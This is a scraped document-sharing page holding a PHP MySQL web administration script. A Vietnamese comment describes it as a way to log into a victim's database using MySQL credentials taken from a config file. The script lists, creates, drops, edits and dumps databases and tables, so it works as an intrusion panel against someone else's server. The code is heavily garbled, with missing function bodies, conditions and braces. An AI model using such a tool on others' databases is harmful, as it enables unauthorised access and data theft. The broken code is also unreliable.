Professional Documents
Culture Documents
id
<?
/*
www.iconpln.co.id
test wepapps
* -------------------------------
* Description :
* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
*/
$HOSTNAME = "localhost";
function logon() {
global $PHP_SELF;
setcookie( "mysql_web_admin_username" );
setcookie( "mysql_web_admin_password" );
echo "<html>\n";
echo "<head>\n";
echo "</head>\n";
echo "<body>\n";
echo "</table><p>\n";
echo "</form>\n";
echo "</center></td></tr></table>\n";
echo "</center></td></tr></table>\n";
echo "</font>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
function logon_submit() {
echo "<html>";
echo "<head>";
echo "</head>";
echo "</html>";
}
function echoQueryResult() {
echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
echo "</table><p>\n";
function listDatabases() {
echo "</form>\n";
echo "<hr>\n";
echo "<tr>\n";
echo "<td>$dbname</td>\n";
echo "</tr>\n";
echo "</table>\n";
function createDatabase() {
listDatabases();
function dropDatabase() {
listDatabases();
function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;
echoQueryResult();
echo "</form>\n";
echo "</form>\n";
echo "<hr>\n";
if( $pTable == 0 ) {
$msg = mysql_error();
return;
echo "<tr>\n";
echo "<td>\n";
echo "$tablename\n";
echo "</td>\n";
echo "<td>\n";
echo "<a
href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a
href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
echo "</td>\n";
echo "</tr>\n";
echo "</table>";
}
function createTable() {
$errMsg = mysql_error();
listTables();
function dropTable() {
$errMsg = mysql_error();
listTables();
function viewSchema() {
echo "<hr>\n";
echo "<tr>\n";
echo "<th>Field</th>\n";
echo "<th>Type</th>\n";
echo "<th>Null</th>\n";
echo "<th>Key</th>\n";
echo "<th>Default</th>\n";
echo "<th>Extra</th>\n";
echo "</tr>\n";
echo "<tr>\n";
echo "<td>".$field["Field"]."</td>\n";
echo "<td>".$field["Type"]."</td>\n";
echo "<td>".$field["Null"]."</td>\n";
echo "<td>".$field["Key"]."</td>\n";
echo "<td>".$field["Default"]."</td>\n";
echo "<td>".$field["Extra"]."</td>\n";
$fieldname = $field["Field"];
echo "<td><a
href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldnam
e'>Edit</a></td>\n";
echo "<td><a
href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldnam
e' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
echo "</tr>\n";
echo "</table>\n";
$fieldtype = $field["Type"];
$fieldkey = $field["Key"];
$fieldextra = $field["Extra"];
$fieldnull = $field["Null"];
$fielddefault = $field["Default"];
break;
} else {
echo "<h3>Name</h3>\n";
echo "<input type=text name=name value=$fieldname><p>\n";
?>
<h3>Type</h3>
<font size=2>
* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>
<table>
<tr>
<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofill</th><th
>binary</th>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-
2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-
9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE
(1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-
838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901
~ 2155, 0000, YYYY)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td align=center>O</td>
</tr>
<tr>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td align=center>O</td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~
65535)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~
65535)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
</tr>
<tr>
<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
</tr>
</table>
<table>
<tr>
<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype,
"unsigned" ) ) echo "checked";?>></td>
<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )
) echo "checked";?>></td>
<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo
"value=\"$valuelist\"";?>></td>
</tr>
</table>
<h3>Flags</h3>
<table>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" )
echo "checked";?>></td>
</tr>
</table>
<p>
<?
echo "</form>\n";
if( $M != "" )
if( $D != "" )
else
} else
$errMsg = mysql_error();
// key change
$keyChange = false;
$primary = "";
$keyChange = true;
else
$keyChange = !$keyChange;
mysql_query( $q );
$queryStr .= "<br>\n" . $q;
mysql_query( $q );
viewSchema();
function dropField() {
$errMsg = mysql_error();
viewSchema();
else
echo "<p class=location>$dbname</p>\n";
echo "<a
href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
$errMsg = mysql_error();
$GLOBALS[queryStr] = $queryStr;
echoQueryResult();
return;
if( $pResult == 1 ) {
$errMsg = "Success";
echoQueryResult();
return;
echo "<hr>\n";
$row = mysql_num_rows( $pResult );
if( $row == 0 ) {
return;
else $page--;
echo "<tr>\n";
echo "<th>";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field-
>name."'>".$field->name."</a>\n";
echo "</th>\n";
echo "</tr>\n";
echo "<tr>\n";
$key = "";
$data = $rowArray[$j];
if( $field->primary_key == 1 )
echo "<td>\n";
echo "$data\n";
echo "</td>\n";
else {
echo "<td><a
href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n"
;
echo "</tr>\n";
echo "</table>\n";
echo "<font size=2>\n";
echo "</font>\n";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
echo "&orderby=$orderby";
echo "'>Prev</a>\n";
} else
echo "Prev";
echo "<a
href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
echo "&orderby=$orderby";
echo "'>Next</a>\n";
} else
echo "Next";
}
echo "</form>\n";
echo "</font>\n";
$key = "";
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
else
}
echo "<p class=location>$dbname > $tablename</p>\n";
echo "<tr>\n";
echo "<th>Name</th>\n";
echo "<th>Type</th>\n";
echo "<th>Function</th>\n";
echo "<th>Data</th>\n";
echo "</tr>\n";
$fieldname = $field["Field"];
$fieldtype = $field["Type"];
echo "<td>$fieldname</td>";
echo "<td>".$field["Type"]."</td>";
echo "<td>\n";
echo "<option>\n";
echo "<option>ASCII\n";
echo "<option>CHAR\n";
echo "<option>SOUNDEX\n";
echo "<option>CURDATE\n";
echo "<option>CURTIME\n";
echo "<option>FROM_DAYS\n";
echo "<option>FROM_UNIXTIME\n";
echo "<option>NOW\n";
echo "<option>PASSWORD\n";
echo "<option>PERIOD_ADD\n";
echo "<option>PERIOD_DIFF\n";
echo "<option>TO_DAYS\n";
echo "<option>USER\n";
echo "<option>WEEKDAY\n";
echo "<option>RAND\n";
echo "</select>\n";
echo "</td>\n";
$value = htmlspecialchars($data[$i]);
echo "<td>\n";
echo "<option>$str\n";
strtok( "'" );
echo "</select>\n";
echo "</td>\n";
} else {
else
echo "<td>\n";
else
echo "<option>$str\n";
strtok( "'" );
echo "</select>\n";
echo "</td>\n";
} else {
else
echo "</tr>";
echo "</table><p>\n";
echo "</form>\n";
$func = $GLOBALS[$field->name."_function"];
if( $field->numeric == 1 ) {
$queryStr .= $GLOBALS[$field->name];
$queryStr .= "),";
else
$queryStr .= ",";
} else {
$queryStr .= "'),";
else
$queryStr .= "',";
if( $field->numeric == 1 )
else
$errMsg = mysql_error();
viewData( "" );
function deleteData() {
$key = "";
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
else
$errMsg = mysql_error();
viewData( "" );
function dump() {
$filename = $tablename;
else
$filename = $dbname;
header("Content-disposition: filename=$filename.sql");
header("Content-type: application/octetstream");
header("Pragma: no-cache");
header("Expires: 0");
while( 1 ) {
$bindir = $rowArray[1]."bin/";
function utils() {
echo "<hr>\n";
echo "Show\n";
echo "<ul>\n";
echo "</ul>\n";
echo "Flush\n";
echo "<ul>\n";
else
else
else
else
echo "</ul>\n";
} else {
echo "Fail";
return;
echo "<hr>\n";
echo "<table cellspacing=1 cellpadding=2 border=0>\n";
echo "<tr>\n";
echo "<th>".$field->name."</th>\n";
echo "</tr>\n";
while( 1 ) {
echo "<tr>\n";
echo "</tr>\n";
echo "</table>\n";
function header_html() {
global $PHP_SELF;
?>
<html>
<head>
<style type="text/css">
<!--
p.location {
color: #FF6000;
font-size: small;
h1 {
color: #0090FF;
th {
background-color: #34A725;
color: #FFFFFF;
font-size: x-small;
td {
background-color: #5DB1FF;
font-size: x-small;
form {
margin-top: 0;
margin-bottom: 0;
a{
text-decoration:none;
color: #848200;
font-size:x-small;
a:link {
a:hover {
background-color:#EEEFD5;
color:#FF0000;
text-decoration:none
//-->
</style>
</head>
<body>
<?
function footer_html() {
echo "<hr>\n";
echo "</font>\n";
echo "</body>\n";
echo "</html>\n";
}
//------------------------------------------------------ MAIN
logon();
logon_submit();
dump();
} else {
echo "<!--";
echo "-->";
echo "<html>\n";
echo "<head>\n";
echo "</head>\n";
echo "<body>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
} else {
header_html();
listDatabases();
createDatabase();
dropDatabase();
listTables();
createTable();
dropTable();
viewSchema();
viewData( $queryStr );
manageField( "add" );
manageField_submit( "add" );
manageField( "edit" );
else if( $action == "editField_submit" )
manageField_submit( "edit" );
dropField();
viewData( "" );
manageData( "add" );
manageData_submit( "add" );
manageData( "edit" );
manageData_submit( "edit" );
deleteData();
utils();
mysql_close( $mysqlHandle);
footer_html();
?>